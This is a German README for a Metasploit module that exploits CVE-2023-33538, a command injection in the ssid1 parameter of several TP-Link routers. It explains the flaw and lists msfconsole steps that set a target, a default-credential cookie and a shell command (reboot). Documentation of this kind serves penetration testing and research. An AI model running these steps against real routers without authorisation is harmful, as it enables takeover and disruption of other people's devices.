
CVE-2023-33538 - TP-Link Befehlsinjektion Ruby-Modul für das Metasploit Framework
Dieses Metasploit-auxiliary module zielt auf eine authentifizierte Command Injection-Schwachstelle in den Routern TP-Link TL-WR940N V2/V4 und TL-WR841N V8/V10 ab.
Das Problem liegt im anfälligen Parameter ssid1, der in WlanNetworkRpm.htm verwendet wird und die Injektion beliebiger Shell-Befehle ermöglicht.
Im Erfolgsfall kann der Angreifer beliebige Befehle auf dem Gerät ausführen.
Weitere Informationen zur CVE:
https://nvd.nist.gov/vuln/detail/CVE-2023-33538
.rb-Datei in Ihren Metasploit-Modulordner, zum Beispiel:cp tplink_ssid1_rce.rb/usr/share/metasploit-framework/modules/auxiliary/admin/http/
msfconsole
search tplink
use auxiliary/admin/http/tplink_ssid1_rce
set RHOSTS 192.168.0.1
set RPORT 80
set AUTHCOOKIE Basic%20YWRtaW46YWRtaW4%3D
set SESSIONPATH /ABCD1234/
set CMD reboot
run
Das Modul führt keine Authentifizierung durch. Sie müssen das
Authorization-Cookie und das Session-Präfix manuell aus einem erfolgreichen Login in der Web-Oberfläche des Routers extrahieren.
Dieses Modul ist nur für Bildungszwecke gedacht.
Verwenden Sie diesen Code nicht gegen Geräte oder Infrastrukturen, die Ihnen nicht gehören oder für die Sie keine ausdrückliche Erlaubnis zum Testen haben.
Wenn Sie Fehler finden oder Ideen für Verbesserungen haben – erstellen Sie gerne ein Issue oder hinterlassen Sie einen Kommentar.